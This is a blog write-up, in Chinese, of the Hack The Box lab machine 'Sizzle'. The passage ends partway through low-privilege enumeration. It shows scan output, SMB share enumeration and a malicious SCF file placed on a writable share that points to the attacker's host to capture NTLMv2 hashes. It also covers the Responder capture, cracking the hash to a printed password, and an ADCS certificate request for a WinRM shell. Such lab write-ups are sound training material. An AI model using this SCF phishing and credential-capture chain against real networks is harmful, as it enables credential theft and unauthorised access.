title: Hack The Box - Sizzle(SCF文件钓鱼) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
It takes guts to make change. 做出改变需要勇气。
Hack The Box - Sizzle:
该机器对于当下的我来说是真不容易,因为它的很多行为表现都触及到了我的知识盲区,我不得不通过搜索引擎不断的搜寻相关资料进行学习,这台机器花费了我很多时间精力。
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 22:51 CST
Stats: 0:04:46 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.88% done; ETC: 22:56 (0:00:15 remaining)
Nmap scan report for 10.10.10.103
Host is up (0.21s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-23T14:58:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2022-04-23T14:58:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-23T14:58:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2022-04-23T14:58:37+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2022-04-23T14:58:36+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2022-04-23T14:58:36+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-23T14:58:05
|_ start_date: 2022-04-23T14:49:39
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 425.59 seconds
FTP端口:
我可以尝试匿名访问21端口,因为Nmap告诉了我Anonymous FTP login allowed,好吧并不行:
$ ftp 10.10.10.103
Connected to 10.10.10.103.
220 Microsoft FTP Service
Name (10.10.10.103:worldisend): worldisend
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
ftp> ls
530 Please login with USER and PASS.
530 Please login with USER and PASS.
ftp: Can't bind for data connection: 地址已在使用
ftp> dir
530 Please login with USER and PASS.
ftp> DNS端口:
我可以先确定目标域,虽然Nmap没帮我探测到标志性的88端口,因为它为我枚举出了HTB.LOCAL与sizzle.htb.local:
$ dig @10.10.10.103 sizzle.htb.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.103 sizzle.htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56747
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 11b28ab1929fa292 (echoed)
;; QUESTION SECTION:
;sizzle.htb.local. IN A
;; ANSWER SECTION:
sizzle.htb.local. 1200 IN A 10.10.10.103
;; Query time: 303 msec
;; SERVER: 10.10.10.103#53(10.10.10.103) (UDP)
;; WHEN: Sat Apr 23 22:55:34 CST 2022
;; MSG SIZE rcvd: 73
$ dig @10.10.10.103 htb,local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.103 htb,local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 21830
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 96e2eeac0b1c8d27 (echoed)
;; QUESTION SECTION:
;htb,local. IN A
;; Query time: 407 msec
;; SERVER: 10.10.10.103#53(10.10.10.103) (UDP)
;; WHEN: Sat Apr 23 22:57:15 CST 2022
;; MSG SIZE rcvd: 5看起来目标确实有两个域,我可以尝试请求区域传输,虽然从未成功过,但我对此好像有一种执念:
$ dig axfr @10.10.10.103 htb.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.103 htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.$ dig axfr @10.10.10.103 sizzle.htb.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.103 sizzle.htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.好吧,它们都不可以。
HTTP端口:
大晚上的放毒:
ASP.NET环境,IIS10.0组件,windows操作系统,除此之外没任何信息:
或许它的域名是sizzle.htb,我可以将其添加到hosts文件中再尝试访问,好吧还是这个页面。我可以尝试去对路径爆破:
$ dirsearch -u http://sizzle.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/worldisend/.dirsearch/reports/sizzle.htb/-_22-04-23_23-05-37.txt
Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-23_23-05-37.log
Target: http://sizzle.htb/
[23:05:38] Starting:
[23:05:42] 403 - 312B - /%2e%2e//google.com
[23:06:23] 403 - 2KB - /Trace.axd
[23:06:26] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[23:07:01] 403 - 1KB - /aspnet_client/
[23:07:01] 301 - 155B - /aspnet_client -> http://sizzle.htb/aspnet_client/
[23:07:15] 403 - 1KB - /certenroll/
[23:07:15] 401 - 1KB - /certsrv/
[23:07:45] 301 - 148B - /images -> http://sizzle.htb/images/
[23:07:45] 403 - 1KB - /images/
[23:07:47] 200 - 60B - /index.html
[23:07:50] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[23:07:50] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[23:07:50] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[23:07:50] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[23:07:50] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
Task Completed/certenroll看起来很有趣,但不幸的是403。
或许我可以再尝试对ip进行爆破:
$ dirsearch -u http://10.10.10.103
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/worldisend/.dirsearch/reports/10.10.10.103/_22-04-23_23-13-27.txt
Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-23_23-13-27.log
Target: http://10.10.10.103/
[23:13:28] Starting:
[23:13:31] 403 - 312B - /%2e%2e//google.com
[23:13:54] 403 - 2KB - /Trace.axd
[23:13:57] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[23:14:29] 403 - 1KB - /aspnet_client/
[23:14:29] 301 - 157B - /aspnet_client -> http://10.10.10.103/aspnet_client/
[23:14:34] 401 - 1KB - /certsrv/
[23:14:34] 403 - 1KB - /certenroll/
[23:14:51] 301 - 150B - /images -> http://10.10.10.103/images/
[23:14:51] 403 - 1KB - /images/
[23:14:52] 200 - 60B - /index.html /certsrv/也很有趣,我尝试打开,它要求我提供身份凭证:
该目录由 Windows 证书颁发机构的证书注册 Web 服务使用。客户端使用它来请求证书,应用程序可以使用这些证书向服务器进行身份验证,而不是密码,或者作为密码身份验证的补充 ,暂时我没有用户凭证信息,我会记住它,或许稍后我会使用它。
RPC端口:
或许我可以试试RPC是否能够匿名访问:
$ rpcclient -U "" -N 10.10.10.103
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 也不可以。
LDAP端口:
$ sudo nmap -sT -Pn -n --open 10.10.10.103 -p389 --script ldap-rootdse
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 23:47 CST
Nmap scan report for 10.10.10.103
Host is up (0.19s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20220423154708.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
| dsServiceName: CN=NTDS Settings,CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
| namingContexts: DC=HTB,DC=LOCAL
| namingContexts: CN=Configuration,DC=HTB,DC=LOCAL
| namingContexts: CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
| namingContexts: DC=DomainDnsZones,DC=HTB,DC=LOCAL
| namingContexts: DC=ForestDnsZones,DC=HTB,DC=LOCAL
| defaultNamingContext: DC=HTB,DC=LOCAL
| schemaNamingContext: CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
| configurationNamingContext: CN=Configuration,DC=HTB,DC=LOCAL
| rootDomainNamingContext: DC=HTB,DC=LOCAL
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 143469
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: sizzle.HTB.LOCAL
| ldapServiceName: HTB.LOCAL:sizzle$@HTB.LOCAL
| serverName: CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 7
| forestFunctionality: 7
|_ domainControllerFunctionality: 7
Service Info: Host: SIZZLE; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds没有更多的信息。
HTTPS端口:
与HTTP一样。没有更多的信息。
SMB端口:
或许我可以访问smb共享试试,smbmap如果不提供一个用户名,会被拒绝访问,但是如果随便填一个不存在的用户名,就可以正常访问到共享信息:
$ smbmap -H 10.10.10.103 -u whoami
[+] Guest session IP: 10.10.10.103:445 Name: sizzle.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server shareCertEnroll共享后的描述很奇怪,它看起来与web端口的登录相互关联。但是我对其并没有可读权限。
Active Directory Certificate Services share
Active Directory证书服务共享
IPC$虽然显示可读但是我并没有遍历权限:
$ smbclient -N //10.10.10.103/IPC$ -U whoami
Try "help" to get a list of possible commands.
smb: \> DIR
NT_STATUS_INVALID_INFO_CLASS listing \*Department Shares中有不少的目录:
$ smbclient -N //10.10.10.103/"Department Shares" -U whoami
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 3 23:22:32 2018
.. D 0 Tue Jul 3 23:22:32 2018
Accounting D 0 Tue Jul 3 03:21:43 2018
Audit D 0 Tue Jul 3 03:14:28 2018
Banking D 0 Tue Jul 3 23:22:39 2018
CEO_protected D 0 Tue Jul 3 03:15:01 2018
Devops D 0 Tue Jul 3 03:19:33 2018
Finance D 0 Tue Jul 3 03:11:57 2018
HR D 0 Tue Jul 3 03:16:11 2018
Infosec D 0 Tue Jul 3 03:14:24 2018
Infrastructure D 0 Tue Jul 3 03:13:59 2018
IT D 0 Tue Jul 3 03:12:04 2018
Legal D 0 Tue Jul 3 03:12:09 2018
M&A D 0 Tue Jul 3 03:15:25 2018
Marketing D 0 Tue Jul 3 03:14:43 2018
R&D D 0 Tue Jul 3 03:11:47 2018
Sales D 0 Tue Jul 3 03:14:37 2018
Security D 0 Tue Jul 3 03:21:47 2018
Tax D 0 Tue Jul 3 03:16:54 2018
Users D 0 Wed Jul 11 05:39:32 2018
ZZ_ARCHIVE D 0 Tue Jul 3 03:32:58 2018
7779839 blocks of size 4096. 3321018 blocks available
但对我有用的只有两个ZZ_ARCHIVE与Users,其他目录中虽然也包含目录,但一层一层找下去都是空的。ZZ_ARCHIVE这堆文件也都是假的。
smb: \ZZ_ARCHIVE\> ls
. D 0 Tue Jul 3 03:32:58 2018
.. D 0 Tue Jul 3 03:32:58 2018
AddComplete.pptx A 419430 Tue Jul 3 03:32:58 2018
AddMerge.ram A 419430 Tue Jul 3 03:32:57 2018
ConfirmUnprotect.doc A 419430 Tue Jul 3 03:32:57 2018
ConvertFromInvoke.mov A 419430 Tue Jul 3 03:32:57 2018
ConvertJoin.docx A 419430 Tue Jul 3 03:32:57 2018
CopyPublish.ogg A 419430 Tue Jul 3 03:32:57 2018
DebugMove.mpg A 419430 Tue Jul 3 03:32:57 2018在user目录中我可以获取到一些用户名信息,尽管目录也都是空的:
smb: \> cd Users\
lsmb: \Users\> ls
. D 0 Wed Jul 11 05:39:32 2018
.. D 0 Wed Jul 11 05:39:32 2018
amanda D 0 Tue Jul 3 03:18:43 2018
amanda_adm D 0 Tue Jul 3 03:19:06 2018
bill D 0 Tue Jul 3 03:18:28 2018
bob D 0 Tue Jul 3 03:18:31 2018
chris D 0 Tue Jul 3 03:19:14 2018
henry D 0 Tue Jul 3 03:18:39 2018
joe D 0 Tue Jul 3 03:18:34 2018
jose D 0 Tue Jul 3 03:18:53 2018
lkys37en D 0 Wed Jul 11 05:39:04 2018
morgan D 0 Tue Jul 3 03:18:48 2018
mrb3n D 0 Tue Jul 3 03:19:20 2018
Public D 0 Wed Sep 26 13:45:32 2018SCF文件攻击:
我看到机器标签中有一个SFC File Attack,我尝试去搜寻更多的资料,我找到了这篇文章,它为我很好的讲述了如何利用smb共享实现SFC文件攻击:
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/引入作者的一段话:
SMB 是一种在组织中广泛用于文件共享目的的协议。在内部渗透测试中发现包含敏感信息(如纯文本密码和数据库连接字符串)的文件共享的情况并不少见。但是,即使文件共享不包含任何可用于连接到其他系统的数据,但它为未经身份验证的用户配置了写入权限,那么也可以获得域用户或 Meterpreter shell 的密码哈希。SCF(Shell 命令文件)文件可用于执行一组有限的操作,例如显示 Windows 桌面或打开 Windows 资源管理器,这并不是什么新鲜事。然而,SCF 文件可用于访问允许渗透测试人员构建攻击的特定 UNC 路径。
将包含UNC链接的文件保存为 SCF 文件在文件名前添加 @ 符号会将 SCF文件放在共享驱动器的顶部。当用户浏览共享时,将自动建立从他的系统到 SCF 文件中包含的 UNC 路径的连接。Windows 将尝试使用用户的用户名和密码对该共享进行身份验证。在该身份验证过程中,从服务器向客户端发送一个随机的 8 字节质询密钥,并使用此质询密钥再次加密散列的 NTLM/LANMAN 密码。响应者将捕获 NTLMv2 哈希。
这看起来是一种钓鱼攻击,首先我要先确定我可以对目标smb共享有写入权限:
smb: \Users\Public\> put user.txt
putting file user.txt as \Users\Public\user.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \Users\Public\> ls
. D 0 Sun Apr 24 00:17:47 2022
.. D 0 Sun Apr 24 00:17:47 2022
user.txt A 70 Sun Apr 24 00:17:48 2022
7779839 blocks of size 4096. 3594965 blocks available
smb: \Users\Public\> 看起来我有,那么我可以尝试构造一个恶意SCF文件,并将其放入smb共享中:
[Shell]
Command=2
IconFile=\\10.10.16.12\share\whoami.ico
[Taskbar]
Command=ToggleDesktopsmb: \Users\Public\> put @whoami.scf
putting file @whoami.scf as \Users\Public\@whoami.scf (0.1 kb/s) (average 0.1 kb/s)
smb: \Users\Public\> ls
. D 0 Sun Apr 24 00:23:16 2022
.. D 0 Sun Apr 24 00:23:16 2022
@whoami.scf A 90 Sun Apr 24 00:23:17 2022
7779839 blocks of size 4096. 3594901 blocks available
smb: \Users\Public\> 该whoami.ico不需要存在,甚至我的共享也不需要开,因为我只需要捕获目标访问到我SCF文件后向我发起的请求即可,至于它能不能请求到不重要。我可以通过responder进行捕获目标的请求,捕获前可看清自己应该捕获哪张网卡,像我就应该是tun0:
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.16.12 netmask 255.255.254.0 destination 10.10.16.12
inet6 dead:beef:4::100a prefixlen 64 scopeid 0x0
inet6 fe80::29e2:dde4:349f:ba4b prefixlen 64 scopeid 0x20
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 57004 bytes 42200602 (40.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 195260 bytes 15547373 (14.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
那么启动responder,需要sudo:
$ sudo responder -I tun0
[sudo] worldisend 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
它会加载一堆配置信息并启动监听,过一会儿,鱼便上钩了:
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.12]
Responder IPv6 [dead:beef:4::100a]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-AKXSZ1UMGHV]
Responder Domain Name [L4AA.LOCAL]
Responder DCE-RPC Port [47287]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:ff4d4e05045d788a:5C9388BDB883B4BAFD6B3E4A39DC172B:0101000000000000001299577157D8019F3CDDBE90A763F300000000020008004C0034004100410001001E00570049004E002D0041004B00580053005A00310055004D0047004800560004003400570049004E002D0041004B00580053005A00310055004D004700480056002E004C003400410041002E004C004F00430041004C00030014004C003400410041002E004C004F00430041004C00050014004C003400410041002E004C004F00430041004C0007000800001299577157D80106000400020000000800300030000000000000000100000000200000473F927FF97217C411CD05D91C8AD1F358C7B950493E76BF1103E2C34595563A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003200000000000000000000000000
[*] Skipping previously captured hash for HTB\amanda它是一个NTLMv2哈希,我无法将其用来PTH横向移动,但是我可以对其进行暴力破解,或许可以获取到amanda账户的明文口令:
$ john -w=/usr/share/wordlists/rockyou.txt --fork=4 ./hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
2 1g 0:00:00:04 DONE (2022-04-24 00:35) 0.2159g/s 616397p/s 616397c/s 616397C/s Asheville..Ashakiran
3 0g 0:00:00:07 DONE (2022-04-24 00:35) 0g/s 496667p/s 496667c/s 496667C/s 0125457423 .a6_123
4 0g 0:00:00:07 DONE (2022-04-24 00:35) 0g/s 495294p/s 495294c/s 495294C/s cxz..*7¡Vamos!
1 0g 0:00:00:07 DONE (2022-04-24 00:35) 0g/s 493252p/s 493252c/s 493252C/s Jakekovac3.ie168
Waiting for 3 children to terminate
Session completed.我获取到了Ashare1972。
申领证书并基于winrm以amanda身份登录目标:
或许我可以尝试去登录目标:
$ evil-winrm -i 10.10.10.103 -u amanda -p Ashare1972
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Sun, 24 Apr 2022 02:02:37 GMT", "Connection"=>"close", "Content-Length"=>"0"}
Body: (401).
Error: Exiting with code 1Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header
错误:WinRM::WinRMHTTPTransportError类型的错误发生,消息是无法解析授权头。
它并不是说像往常一样身份认证失败或是网络链接超时,或许这点我需要留意一下。不过起码我的口令应该是正确的。或许我可以解锁新的smb共享:
$ smbmap -H 10.10.10.103 -u amanda -p Ashare1972
[+] IP: 10.10.10.103:445 Name: sizzle.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share确实,我可以访问CertEnroll 与NETLOGON 、SYSVOL,
$ smbclient //10.10.10.103/CertEnroll -U amanda%Ashare1972
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 23 14:35:47 2022
.. D 0 Sat Apr 23 14:35:47 2022
HTB-SIZZLE-CA+.crl A 721 Sat Apr 23 14:35:47 2022
HTB-SIZZLE-CA.crl A 909 Sat Apr 23 14:35:47 2022
nsrev_HTB-SIZZLE-CA.asp A 322 Tue Jul 3 04:36:05 2018
sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Tue Jul 3 04:36:03 2018
7779839 blocks of size 4096. 3573522 blocks available像是一堆证书,我想起在web端有一个登录框要求我提供账户凭证,或许我可以用amanda去试一试:
确实可以,看到下载按钮时,我觉得我可以去验证一下网站目录与共享目录是否存在关联,如果存在我可以试着在共享目录中放入webshell,但是它们似乎不关联:
下载的文件名,与共享目录中的都对不上。或许我可以去申请一本证书,但我点申请用户证书会报错:
或许我需要自己生成证书提交给它,但是生成证书能拿来干什么,我大概猜到了:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2022-04-23T14:58:36+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23evil-winrm是基于Microsoft WinRM(Windows 远程管理)实现的,通常在端口 5985 上,5985并不行,因为刚刚我已经连接过了,它说无法解析。5986是一个需要ssl证书的端口。或许证书是被用在这里的,我可以生成一本证书:
$ openssl req -nodes -newkey rsa:2048 -keyout amanda.key -out amanda.csr
Generating a RSA private key
...........................................................+++++
.............+++++
writing new private key to 'amanda.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:将csr文件中的内容复制进去并提交:
它会生成一个下载页面:
这次我可以带上它给予我的证书用evil-winrm去连接:
$ evil-winrm -c certnew.cer -k amanda.key -i 10.10.10.103 -u amanda -p Ashare1972 -S
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\amanda\Documents>主机侦测:
我并没有找到user.txt:
*Evil-WinRM* PS C:\Users\amanda\desktop> ls -force
Directory: C:\Users\amanda\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 12/2/2018 5:09 PM 282 desktop.ini
*Evil-WinRM* PS C:\Users\amanda\desktop> 这是user目录:
*Evil-WinRM* PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/2/2018 4:29 PM .NET v4.5
d----- 7/2/2018 4:29 PM .NET v4.5 Classic
d----- 8/19/2018 3:04 PM administrator
d----- 9/30/2018 5:05 PM amanda
d----- 7/2/2018 12:39 PM mrlky
d----- 7/11/2018 5:59 PM mrlky.HTB
d-r--- 11/20/2016 8:24 PM Public
d----- 7/3/2018 10:32 PM WSEnrollmentPolicyServer
d----- 7/3/2018 10:49 PM WSEnrollmentServer我可以看到有个 mrlky用户。但是我当前的用户权限很低,除了我自己的目录哪里也去不了:
*Evil-WinRM* PS C:\users\mrlky.htb> cd ..
*Evil-WinRM* PS C:\users> cd public
*Evil-WinRM* PS C:\users\public> ls
Access to the path 'C:\users\public' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\users\public:String) [Get-ChildItem], UnauthorizedAccessException
